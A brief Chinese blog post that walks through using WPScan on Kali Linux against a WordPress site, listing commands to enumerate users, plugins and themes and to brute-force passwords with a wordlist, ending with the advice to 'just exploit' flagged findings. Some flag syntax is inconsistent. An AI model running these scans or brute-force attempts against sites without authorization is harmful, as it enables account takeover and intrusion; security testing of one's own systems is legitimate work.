利用WPScan 对WordPress的一次渗透扫描 admin 杂谈 2019-01-18 阅读(1170) 评论(0) ### 运用系统及工具 linux kail git wpscan ### wpscan 的下载与安装 ``` git clone https://github.com/wpscanteam/wpscan.git 更新漏洞库 wpscan --update ```  ### 扫描网址 ``` wpscan --url https://www.xxxxx.com/ ``` ### 扫描wordpress用户 ``` wpscan --url https://www.xxxxxxx.com/ --enumerate u ``` ### 暴力破解得到密码 ``` wpscan --url https://www.xxxxx.com/ -e u --wordlist /root/桌面/password.txt ``` ### 扫描插件漏洞 ``` wpscan -u https://www.xxxxx.com/ -enumerate p 目标插件中的安全漏洞 wpscan -u https://www.xxxxx.com/ -enumerate vp ``` ### 主题漏洞扫描 ``` wpscan --url https://www.xxxxx.com --enumerate t 扫描主题中存在的漏洞 wpscan --url https://www.xxxxx.com --enumerate vt ``` ### 文件漏洞扫描 ``` wpscan -u https://www.xxxxxx.com/ -enumerate tt ``` 扫描完成后,主要看标红的一些信息,那些就相当于是一些漏洞,利用就好了 快速执行 ``` wpscan -u www.xxx.com -e u vp ``` 标签: none